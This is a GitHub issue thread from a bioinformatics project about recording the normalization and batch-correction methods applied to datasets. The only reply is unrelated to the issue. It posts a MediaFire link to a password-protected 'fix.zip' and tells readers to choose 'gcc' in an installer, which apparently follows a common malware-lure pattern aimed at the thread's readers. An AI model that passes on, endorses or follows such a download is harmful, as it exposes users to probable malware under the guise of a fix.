### ISSUE TITLE
Store and Display normalization/batch correction applied to a given dataset

### ISSUE THREAD

**Issue by mauromiguelm** [bigomics/omicsplayground#1055]
With the new normalization/bc module we have several normalization options, we need to show them to the user (load datasets table?) and maybe apply them during dataset re-computation.

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
